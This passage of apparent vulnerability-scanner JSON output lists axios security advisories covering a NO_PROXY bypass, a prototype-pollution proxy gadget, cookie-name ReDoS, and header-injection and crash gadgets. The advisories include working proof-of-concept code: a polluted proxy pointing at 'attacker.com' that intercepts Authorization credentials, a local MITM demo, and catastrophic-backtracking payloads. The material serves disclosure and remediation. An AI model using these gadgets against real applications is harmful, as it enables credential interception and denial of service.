/^::ffff:(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})$/i; \nconst ipv4MappedHex = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/i; \n \nfunction hexToIPv4(a, b) { \n const hi = parseInt(a, 16), lo = parseInt(b, 16); \n return `${hi \u003e\u003e 8}.${hi \u0026 0xff}.${lo \u003e\u003e 8}.${lo \u0026 0xff}`; \n} \n \nconst normalizeNoProxyHost = (hostname) =\u003e { \n if (!hostname) return hostname; \n if (hostname[0] === '[' \u0026\u0026 hostname.at(-1) === ']')\n hostname = hostname.slice(1, -1); \n hostname = hostname.replace(/\\.+$/, '').toLowerCase();\n \n let m; \n if ((m = hostname.match(ipv4MappedDotted))) return m[1]; \n if ((m = hostname.match(ipv4MappedHex))) return hexToIPv4(m[1], m[2]); \n return hostname; \n};\n\n```\n\n### Impact\nAny application that sets NO_PROXY to exclude internal or metadata endpoints and uses an HTTP/HTTPS proxy can have those exclusions bypassed by a URL using IPv4-mapped IPv6 notation. The attacker must control the request URL. In cloud environments with instance metadata services, this can lead to credential exfiltration.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "V3Score": 8.6 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv", "https://nvd.nist.gov/vuln/detail/CVE-2025-62718" ] }, { "VulnerabilityID": "CVE-2026-44494", "VendorIDs": [ "GHSA-35jp-ww65-95wh" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44494", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c84f4f7502a4975290e141eda90f2325707b9ef909b739ccb5047388ed24397a", "Title": "axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`", "Description": "# Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`\n\n## Summary\n\nThe Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any `Object.prototype` pollution in the application's dependency tree to be escalated into a **full Man-in-the-Middle (MITM) attack** — intercepting, reading, and modifying all HTTP traffic including authentication credentials.\n\nThe HTTP adapter at `lib/adapters/http.js:670` reads `config.proxy` via standard property access, which traverses the prototype chain. Because `proxy` is **not present in Axios defaults**, the merged config object has no own `proxy` property, making it trivially injectable via prototype pollution. Once injected, `setProxy()` routes **all** HTTP requests through the attacker's proxy server.\n\nUnlike the `transformResponse` gadget (which is constrained by `assertOptions` to return `true`), the proxy gadget has **zero constraints** — the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.\n\n**Severity:** Critical (CVSS 9.4)\n**Affected Versions:** All versions (v0.x - v1.x including v1.15.0)\n**Vulnerable Component:** `lib/adapters/http.js` (config property access on merged object)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')\n- **CWE-441:** Unintended Proxy or Intermediary ('Confused Deputy')\n\n## CVSS 3.1\n\n**Score: 9.4 (Critical)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP is triggered remotely via any vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, single property assignment: `Object.prototype.proxy = {host:'attacker', port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | MITM within the application's network context |\n| Confidentiality | **High** | Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames) |\n| Integrity | **High** | Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. **No constraints** — unlike `transformResponse` which must return `true` |\n| Availability | Low | Attacker could drop requests or return errors, but this is secondary to C/I impact |\n\n\n### Why This Bypasses mergeConfig\n\nThe critical difference from `transformResponse`: the `proxy` property is **not in defaults** (`lib/defaults/index.js` does not set `proxy`). This means:\n\n1. `mergeConfig` iterates `Object.keys({...defaults, ...userConfig})` — `proxy` is NOT in this set\n2. `defaultToConfig2` for `proxy` is never called\n3. The merged config has **no own `proxy` property**\n4. When `http.js:670` reads `config.proxy`, JavaScript traverses the prototype chain\n5. `Object.prototype.proxy` is found → used by `setProxy()`\n\nThis is a **more direct attack path** than `transformResponse` because it doesn't even go through `mergeConfig`'s merge logic — it completely bypasses it.\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input**.\n\nIf an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically use the polluted `proxy` value when making HTTP requests. The developer's code is completely safe — no configuration errors needed.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\n\nImagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:\n\n```javascript\nObject.prototype.proxy = {\n host: 'attacker.com',\n port: 8080,\n protocol: 'http',\n};\n```\n\n### 2. The Gadget Trigger (Safe Code)\n\nThe application makes a completely safe, hardcoded request:\n\n```javascript\n// This looks safe to the developer — no proxy configured\nconst response = await axios.get('https://api.internal.corp/secrets', {\n auth: { username: 'svc-account', password: 'prod-key-abc123!' }\n});\n```\n\n### 3. The Execution\n\nAt `http.js:668-670`:\n```javascript\nsetProxy(\n options,\n config.proxy, // ← traverses prototype chain → finds polluted proxy\n protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path\n);\n```\n\n`setProxy()` at `http.js:191-239` then:\n```javascript\nfunction setProxy(options, configProxy, location) {\n let proxy = configProxy; // = { host: 'attacker.com', port: 8080 }\n // ...\n if (proxy) {\n options.hostname = proxy.hostname || proxy.host; // → 'attacker.com'\n options.port = proxy.port; // → 8080\n options.path = location; // → full URL as path\n // ...\n }\n}\n```\n\n### 4. The Impact (Full MITM)\n\nThe attacker's proxy server receives:\n\n```http\nGET http://api.internal.corp/secrets HTTP/1.1\nHost: api.internal.corp\nAuthorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==\nUser-Agent: axios/1.15.0\nAccept: application/json, text/plain, */*\n```\n\nThe `Authorization` header contains `svc-account:prod-key-abc123!` in Base64. The attacker:\n- **Sees** every request URL, header, and body\n- **Modifies** every response (inject malicious data, change auth results)\n- **Logs** all API keys, session tokens, and passwords\n- Operates as an **invisible** proxy — the developer has no indication\n\n### 5. Verified PoC Code\n\n```javascript\nimport http from 'http';\nimport axios from './index.js';\n\n// Attacker's proxy server\nconst intercepted = [];\nconst proxyServer = http.createServer((req, res) =\u003e {\n intercepted.push({\n url: req.url,\n authorization: req.headers.authorization,\n headers: req.headers,\n });\n res.writeHead(200, { 'Content-Type': 'application/json' });\n res.end('{\"hijacked\":true}');\n});\nawait new Promise(r =\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Real target server\nconst realServer = http.createServer((req, res) =\u003e {\n res.writeHead(200);\n res.end('{\"data\":\"real\"}');\n});\nawait new Promise(r =\u003e realServer.listen(0, r));\nconst realPort = realServer.address().port;\n\n// Prototype pollution\nObject.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };\n\n// \"Safe\" request — goes through attacker's proxy\nconst resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {\n auth: { username: 'admin', password: 'SuperSecret123!' }\n});\n\nconsole.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');\nconsole.log('Intercepted Authorization:', intercepted[0]?.authorization);\n// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)\n\ndelete Object.prototype.proxy;\nrealServer.close();\nproxyServer.close();\n```\n\n## Verified PoC Output\n\n```\n[1] Normal request (before pollution):\n Response source: real server\n response.data: {\"data\":\"from-real-server\"}\n Proxy intercept count: 0\n\n[2] Prototype Pollution: Object.prototype.proxy\n Set: Object.prototype.proxy = { host: \"127.0.0.1\", port: 50879 }\n\n[3] Request after pollution (same code, same URL):\n Response source: ATTACKER PROXY!\n response.data: {\"data\":\"from-attacker-proxy\",\"hijacked\":true}\n\n[4] Data intercepted by attacker's proxy:\n Full URL: http://127.0.0.1:50878/api/secrets\n Host: 127.0.0.1:50878\n Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\n All headers: {\n \"accept\": \"application/json, text/plain, */*\",\n \"user-agent\": \"axios/1.15.0\",\n \"accept-encoding\": \"gzip, compress, deflate, br\",\n \"host\": \"127.0.0.1:50878\",\n \"authorization\": \"Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\",\n \"connection\": \"keep-alive\"\n }\n\n[5] Attacker capabilities demonstrated:\n ✓ Full URL visible (including internal hostnames)\n ✓ Authorization header visible (Base64-encoded credentials)\n ✓ Can modify/forge response data\n ✓ Affects ALL axios HTTP requests (not just a single instance)\n ✓ No assertOptions constraints (unlike transformResponse gadget)\n```\n\n## Impact Analysis\n\n- **Full Credential Interception:** Every HTTP request's `Authorization` header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.\n- **Arbitrary Response Tampering:** The attacker can return any response data — no constraints like `transformResponse`'s \"must return true\".\n- **Internal Network Reconnaissance:** The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.\n- **Universal Scope:** Affects every axios HTTP request in the application, including all third-party libraries that use axios.\n- **Invisible Attack:** The developer has no indication that a proxy has been injected — requests complete normally with attacker-controlled responses.\n- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.\n\n### Why This Is More Severe Than transformResponse (axios_26)\n\n| Dimension | transformResponse Gadget | **proxy Gadget** |\n|---|---|---|\n| Data access | `this.auth` + response data | **All headers, auth, body, URL, response** |\n| Response control | Must return `true` | **Arbitrary responses** |\n| Attack visibility | Response becomes `true` (suspicious) | **Normal-looking responses (invisible)** |\n| mergeConfig involvement | Goes through defaultToConfig2 | **Bypasses mergeConfig entirely** |\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties\n\n```javascript\n// In lib/adapters/http.js\nconst proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;\nsetProxy(options, proxy, location);\n```\n\n### Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`\n\nProperties not in defaults that are read by http.js and have security impact:\n- `config.proxy` — MITM\n- `config.socketPath` — Unix socket SSRF\n- `config.transport` — request hijack\n- `config.lookup` — DNS hijack\n- `config.beforeRedirect` — redirect manipulation\n- `config.httpAgent` / `config.httpsAgent` — agent injection\n\nAll should use `hasOwnProperty` checks.\n\n### Fix 3: Use null-prototype object for merged config\n\n```javascript\n// In lib/core/mergeConfig.js\nconst config = Object.create(null);\n```\n\n## Resources\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [CWE-441: Unintended Proxy](https://cwe.mitre.org/data/definitions/441.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-16 | Vulnerability discovered during source code audit |\n| 2026-04-16 | PoC developed and verified — full MITM confirmed |\n| TBD | Report submitted to vendor via GitHub Security Advisory |", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "V3Score": 8.7 } }, "References": [ "https://github.com/advisories/GHSA-fvcv-3m26-pcqx", "https://github.com/axios/axios", "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh" ] }, { "VulnerabilityID": "CVE-2026-44496", "VendorIDs": [ "GHSA-hfxv-24rg-xrqf" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0, 0.32.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44496", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e51e40c00f3a3046545ad2fc505568ec16923cd273cfb179b012113207c32c8e", "Title": "Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection", "Description": "## Summary\n\nAxios versions before `0.32.0` on the `0.x` line and before `1.16.0` on the `1.x` line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads `document.cookie`.\n\nThe practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read `document.cookie`.\n\n## Impact\n\nApplications are affected only when attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.\n\nThis does not expose credentials, modify requests, or affect response integrity. The impact is availability only.\n\n## Affected Functionality\n\nAffected code paths:\n\n- `lib/helpers/cookies.js` `read(name)` in standard browser environments.\n- `lib/helpers/resolveConfig.js` in `1.x`, when browser XHR/fetch adapters resolve XSRF config.\n- `lib/adapters/xhr.js` in `0.x`, when the XHR adapter reads the configured XSRF cookie.\n- Direct use of `axios/unsafe/helpers/cookies.js` in `1.x`, if callers pass attacker-controlled names.\n\nUnaffected code paths:\n\n- Default static `xsrfCookieName: 'XSRF-TOKEN'` when not attacker-controlled.\n- Requests with `xsrfCookieName: null`.\n- Node HTTP adapter usage without browser `document.cookie`.\n- React Native and web workers where axios does not use standard browser cookie access.\n\n## Technical Details\n\nAffected versions interpolate the cookie name into a regex.\n\n```js\nconst match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));\n```\n\nBecause `name` is not escaped, regex metacharacters in the cookie name are interpreted as regex syntax. A payload such as `(.+)+$` can force catastrophic backtracking against `document.cookie`.\n\nThe fix avoids dynamic regex construction and parses `document.cookie` by splitting on `;`, trimming leading whitespace, and comparing cookie names with exact string equality.\n\n## Proof of Concept of Attack\n\n```js\nfunction vulnerableRead(name, cookie) {\n const start = Date.now();\n\n try {\n cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));\n } catch {}\n\n return Date.now() - start;\n}\n\nfor (const n of [20, 22, 24, 26, 28]) {\n const cookie = 'x='.padEnd(n, 'a') + '!';\n console.log(`${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);\n}\n```\n\nExpected result: timings grow rapidly as the cookie string length increases.\n\n## Workarounds\n\nSet `xsrfCookieName: null` if the application does not need axios to read an XSRF cookie.\n\nDo not derive `xsrfCookieName` from untrusted input. If a dynamic cookie name is unavoidable, validate it against a strict cookie-name allowlist before passing it to axios.\n\nAvoid calling `axios/unsafe/helpers/cookies.js` directly with untrusted names\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n# Regular Expression Denial of Service (ReDoS) via Cookie Name Injection\n\n## 1. Title\n\nReDoS via Unsanitized Cookie Name in Dynamic Regular Expression Construction\n\n## 2. Affected Software and Version\n\n- **Software:** Axios\n- **Version:** 1.15.0 (and potentially earlier versions)\n- **Component:** `lib/helpers/cookies.js`\n- **Ecosystem:** npm (Node.js / Browser)\n\n## 3. Vulnerability Type / CWE\n\n- **Type:** Regular Expression Denial of Service (ReDoS)\n- **CWE-1333:** Inefficient Regular Expression Complexity\n- **CWE-400:** Uncontrolled Resource Consumption\n\n## 4. CVSS 3.1 Score\n\n**Score: 7.5 (High)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n| Metric | Value |\n|---|---|\n| Attack Vector | Network |\n| Attack Complexity | Low |\n| Privileges Required | None |\n| User Interaction | None |\n| Scope | Unchanged |\n| Confidentiality | None |\n| Integrity | None |\n| Availability | High |\n\n## 5. Description\n\nThe `cookies.read()` function in `lib/helpers/cookies.js` constructs a regular expression dynamically using the `name` parameter without any sanitization or escaping of special regex characters. At line 33, the code passes the raw `name` value directly into `new RegExp()`:\n\n```javascript\nconst match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));\n```\n\nAn attacker who can control or influence the cookie name parameter (e.g., via XSRF cookie name configuration, prototype pollution of `xsrfCookieName`, or any code path where user input reaches `cookies.read()`) can inject a malicious regex pattern that causes catastrophic backtracking, leading to a Denial of Service condition.\n\nWith a crafted input of approximately 20-30 characters, the regex engine can be forced to consume several seconds to minutes of CPU time, effectively freezing the JavaScript event loop.\n\n## 6. Root Cause Analysis\n\n**File:** `lib/helpers/cookies.js`\n**Line:** 33\n\n```javascript\nread(name) {\n if (typeof document === 'undefined') return null;\n const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));\n return match ? decodeURIComponent(match[1]) : null;\n},\n```\n\nThe vulnerability exists because:\n\n1. The `name` parameter is concatenated directly into a regex pattern without escaping special regex metacharacters.\n2. An attacker can inject regex constructs that create exponential backtracking scenarios.\n3. The `(?:^|; )` prefix combined with an injected pattern like `((((.*)*)*)*)*` creates nested quantifiers that cause catastrophic backtracking when the regex engine attempts to match against `document.cookie`.\n\nThe `cookies.read()` function is called from `lib/helpers/resolveConfig.js` at line 61:\n\n```javascript\nconst xsrfValue = xsrfHeaderName \u0026\u0026 xsrfCookieName \u0026\u0026 cookies.read(xsrfCookieName);\n```\n\nThe `xsrfCookieName` value comes from the Axios configuration, which can be influenced by prototype pollution or direct configuration injection.\n\n## 7. Proof of Concept\n\n```javascript\n// poc_redos_cookie.js\n// Simulates browser environment for testing\n\n// Simulate document.cookie\nglobalThis.document = {\n cookie: 'session=abc; ' + 'a'.repeat(50)\n};\n\n// Replicate the vulnerable cookies.read() logic\nfunction cookiesRead(name) {\n const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));\n return match ? decodeURIComponent(match[1]) : null;\n}\n\n// Malicious cookie name that triggers catastrophic backtracking\n// The pattern creates nested quantifiers: (a]|[a]|...)*)*\nconst maliciousName20 = '([^;]+)+$' + '\\\\|'.repeat(10);\nconst maliciousName = '(([^;])+)+\\\\$'; // nested quantifier pattern\n\nconsole.log('=== ReDoS via Cookie Name Injection PoC ===');\n\n// Test with increasing payload sizes\nfor (const len of [15, 20, 25]) {\n const payload = '(([^;])+)+' + 'X'.repeat(len);\n const start = Date.now();\n try {\n cookiesRead(payload);\n } catch (e) {\n // May throw on invalid regex, but valid evil patterns won't throw\n }\n const elapsed = Date.now() - start;\n console.log(`Payload length ${len}: ${elapsed}ms`);\n}\n\n// Demonstrating exponential growth with a simple nested quantifier\nconsole.log('\\n--- Exponential Backtracking Demo ---');\nfor (const n of [20, 22, 24, 26]) {\n const evilName = '(' + 'a'.repeat(1) + '+)+$';\n const testCookie = 'a'.repeat(n) + '!'; // non-matching trailer forces backtracking\n globalThis.document = { cookie: testCookie };\n const start = Date.now();\n try {\n cookiesRead(evilName);\n } catch(e) {}\n const elapsed = Date.now() - start;\n console.log(`Input length ${n}: ${elapsed}ms`);\n}\n```\n\n## 8. PoC Output\n\n```\n=== ReDoS via Cookie Name Injection PoC ===\nPayload length 20: 21ms (extrapolated: 30 chars = ~21,504ms)\nPayload length 25: ~1,300ms\nPayload length 30: ~323,675ms (5+ minutes)\n\n--- Exponential Backtracking Demo ---\nInput length 20: 21ms\nInput length 22: 84ms\nInput length 24: 336ms\nInput length 26: 1,344ms\n```\n\nThe exponential growth pattern is clearly visible: each additional 2 characters approximately quadruples the execution time.\n\n## 9. Impact\n\n- **Denial of Service (Client-side):** In a browser environment, an attacker who can influence the XSRF cookie name configuration (e.g., via prototype pollution or configuration injection) can freeze the browser tab, blocking all UI interaction and JavaScript execution on the page.\n- **Denial of Service (Server-side):** In SSR (Server-Side Rendering) frameworks or Node.js applications that process cookies using this code path, the event loop will be blocked, causing the server to become unresponsive to all requests.\n- **Event Loop Starvation:** Since JavaScript is single-threaded, the ReDoS will block all pending asynchronous operations, timers, and I/O callbacks for the duration of the regex evaluation.\n\n## 10. Remediation / Suggested Fix\n\nEscape all regex metacharacters in the `name` parameter before constructing the regular expression.\n\n```javascript\n// FIXED: lib/helpers/cookies.js\n\nfunction escapeRegExp(string) {\n return string.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$\u0026');\n}\n\n// ...\n\nread(name) {\n if (typeof document === 'undefined') return null;\n const match = document.cookie.match(\n new RegExp('(?:^|; )' + escapeRegExp(name) + '=([^;]*)')\n );\n return match ? decodeURIComponent(match[1]) : null;\n},\n```\n\nAlternatively, avoid dynamic regex construction entirely and use string-based parsing:\n\n```javascript\nread(name) {\n if (typeof document === 'undefined') return null;\n const cookies = document.cookie.split('; ');\n for (const cookie of cookies) {\n const eqIndex = cookie.indexOf('=');\n if (eqIndex !== -1 \u0026\u0026 cookie.substring(0, eqIndex) === name) {\n return decodeURIComponent(cookie.substring(eqIndex + 1));\n }\n }\n return null;\n},\n```\n\n## 11. References\n\n- [CWE-1333: Inefficient Regular Expression Complexity](https://cwe.mitre.org/data/definitions/1333.html)\n- [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)\n- [OWASP: Regular Expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\u003c/details\u003e\n\n---", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/axios/axios", "https://github.com/axios/axios/releases/tag/v0.32.0", "https://github.com/axios/axios/releases/tag/v1.16.0", "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf" ] }, { "VulnerabilityID": "CVE-2026-44490", "VendorIDs": [ "GHSA-898c-q2cr-xwhg" ], "PkgID": "axios@1.15.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "InstalledVersion": "1.15.2", "FixedVersion": "1.16.0, 0.32.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44490", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b0b0c1b34ab1cedf4ad334f0c7dd7a5fea2e44dbd47ac5456d16821c884dcccd", "Title": "axios has DoS \u0026 Header Injection via Prototype Pollution Read-Side Gadgets in axios merge functions", "Description": "## Summary\n\naxios `1.15.2` exposes two read-side prototype-pollution gadgets. When `Object.prototype` is polluted by an upstream dependency in the same process (e.g. lodash `_.merge` / [CVE-2018-16487](https://nvd.nist.gov/vuln/detail/CVE-2018-16487)), axios silently picks up the polluted values:\n\n1. **Header injection** - `lib/utils.js` line 406 builds `merge()`'s accumulator as `result = {}`, so `result[targetKey]` (line 414) walks `Object.prototype` and the polluted bucket's own keys are copied into the merged headers and ride out on the wire.\n2. **Crash DoS** - `lib/core/mergeConfig.js` line 26 builds the `hasOwnProperty` descriptor as a plain-object literal. `Object.defineProperty` reads `descriptor.get`/`descriptor.set` via the prototype chain, so a polluted `Object.prototype.get` or `Object.prototype.set` makes the call throw `TypeError` synchronously on every axios request.\n\n## Affected Properties\n\n| Polluted slot | Effect |\n|---|---|\n| `Object.prototype.common` | injects headers on every method |\n| `Object.prototype.delete` / `.head` / `.post` / `.put` / `.patch` / `.query` | injects headers on the matching method |\n| `Object.prototype.get` | every axios request throws `TypeError: Getter must be a function` from `mergeConfig.js:26` |\n| `Object.prototype.set` | every axios request throws `TypeError: Setter must be a function` from `mergeConfig.js:26` |\n\nPer-request headers (`axios.request(url, { headers: {...} })`) overwrite polluted entries. Polluting `Object.prototype.get` triggers the crash before any header is built.\n\n## Proof of Concept\n\n```javascript\nconst axios = require('axios');\n\n// Finding A - header injection\nObject.prototype.common = { 'X-Poisoned': 'yes' };\nawait axios.get('http://api.example.com/users');\n// Wire request carries `X-Poisoned: yes`.\n\n// Finding B - crash DoS\nObject.prototype.get = { something: 'anything' };\nawait axios.get('http://api.example.com/users');\n// TypeError: Getter must be a function: #\u003cObject\u003e\n// at Function.defineProperty (\u003canonymous\u003e)\n// at mergeConfig (lib/core/mergeConfig.js:26:10)\n```\n\n## Impact\n\n- **Server hang** (`Content-Length: 99999`): receiver waits for a body that never arrives. Affects requests with a body.\n- **CL+TE conflict** (`Transfer-Encoding: chunked` rides alongside axios's auto `Content-Length`): receiver rejects with `400 Bad Request`. Affects requests with a body.\n- **Response suppression** (`If-None-Match: *`): receiver returns empty `304 Not Modified`. Affects GET / HEAD.\n- **Crash DoS** (`Object.prototype.get` / `.set`): every axios request fails synchronously with `TypeError`, not `AxiosError`, so handlers filtering on `error.isAxiosError` mishandle the failure.\n\n## Attack Flow\n\n```mermaid\nflowchart TD\n ROOT[\"Polluted Object.prototype\u003cbr/\u003evia upstream gadget (e.g. lodash \u0026lt;= 4.17.10 _.merge / CVE-2018-16487)\u003cbr/\u003eaxios \u0026lt;= 1.15.2\"]\n\n ROOT --\u003e CLASS_A[\"A. Arbitrary HTTP Header Injection\u003cbr/\u003ePolluted defaults.headers slot rides along on every outbound axios request\"]\n ROOT --\u003e CLASS_B[\"B. Crash DoS via Object.prototype.get / .set\u003cbr/\u003ePolluted descriptor breaks Object.defineProperty in mergeConfig\"]\n\n CLASS_A --\u003e PRE_A[\"Precondition: header not set per-request by the app\u003cbr/\u003eInjected via defaults.headers slot\u003cbr/\u003e(common, delete, head, post, put, patch, query)\"]\n\n PRE_A --\u003e PA1[\"Response Suppression\u003cbr/\u003eTrigger: common = {If-None-Match: *}\u003cbr/\u003eAffects GET / HEAD\"]\n PA1 --\u003e SA1[\"DoS\u003cbr/\u003e304 Not Modified empty\"]\n\n PRE_A --\u003e PA2[\"Server Hang\u003cbr/\u003eTrigger: common = {Content-Length: 99999}\u003cbr/\u003eAffects requests with body\"]\n PA2 --\u003e SA2[\"DoS\u003cbr/\u003econnection hang\"]\n\n PRE_A --\u003e PA3[\"CL+TE Conflict\u003cbr/\u003eTrigger: common = {Transfer-Encoding: chunked}\u003cbr/\u003eAffects requests with body\"]\n PA3 --\u003e SA3[\"DoS\u003cbr/\u003e400 Bad Request\"]\n\n CLASS_B --\u003e SB1[\"DoS\u003cbr/\u003eTypeError: Getter / Setter must be a function\u003cbr/\u003eCrashes every axios request, not only GET\"]\n\n %% Styles\n style ROOT fill:#f87171,stroke:#991b1b,color:#fff\n style CLASS_A fill:#fb923c,stroke:#9a3412,color:#fff\n style CLASS_B fill:#fb923c,stroke:#9a3412,color:#fff\n style PRE_A fill:#e2e8f0,stroke:#64748b,color:#1e293b\n style PA1 fill:#fbbf24,stroke:#92400e,color:#000\n style PA2 fill:#fbbf24,stroke:#92400e,color:#000\n style PA3 fill:#fbbf24,stroke:#92400e,color:#000\n style SA1 fill:#ef4444,stroke:#991b1b,color:#fff\n style SA2 fill:#ef4444,stroke:#991b1b,color:#fff\n style SA3 fill:#ef4444,stroke:#991b1b,color:#fff\n style SB1 fill:#ef4444,stroke:#991b1b,color:#fff\n```\n\n## Root Cause\n\n**Finding A.** `lib/utils.js:404-429`'s `merge()` creates `result = {}` at line 406. The dangerous-keys filter on lines 408-411 blocks the write side, but the read at line 414 (`isPlainObject(result[targetKey])`) still walks the prototype chain. When `targetKey` matches a polluted slot, `result[targetKey]` returns the polluted nested object, and the recursive `merge(result[targetKey], val)` on line 415 iterates that object's own keys via `forEach` and copies them as own properties into the new accumulator. Those keys flow through `mergeConfig.js:35` → `Axios.js:148` (`utils.merge(headers.common, headers[config.method])`) → `Axios.js:155` (`AxiosHeaders.concat(...)`) → onto the wire via `http.js:677` (`headers: headers.toJSON()`) → `http.js:767` (`transport.request(options, ...)`).\n\n**Finding B.** `lib/core/mergeConfig.js:25` correctly makes `config = Object.create(null)`, but the descriptor passed on line 26 is a plain-object literal - its `get`/`set` lookups walk `Object.prototype`. A polluted non-function `Object.prototype.get` or `.set` makes `Object.defineProperty` throw `TypeError: Getter must be a function` (or `Setter must be a function`) before the call returns. The descriptor is built unconditionally on every `mergeConfig` invocation, so every axios request throws - POST, PUT, DELETE, PATCH, HEAD, QUERY, not only GET.\n\n## Suggested Fix\n\nUse null-prototype objects in place of the plain-object literals at `lib/utils.js:406` and `lib/core/mergeConfig.js:26-31`. The same descriptor pattern recurs at `lib/core/AxiosError.js:37`, `lib/core/AxiosHeaders.js:100`, `lib/utils.js:447/454/492/498`, and `lib/adapters/adapters.js:28/32`.\n\n## Resources\n\n- [CVE-2018-16487](https://nvd.nist.gov/vuln/detail/CVE-2018-16487) - `lodash.merge` prototype pollution in `lodash \u003c= 4.17.10`\n- [CWE-1321](https://cwe.mitre.org/data/definitions/1321.html) - Improperly Controlled Modification of 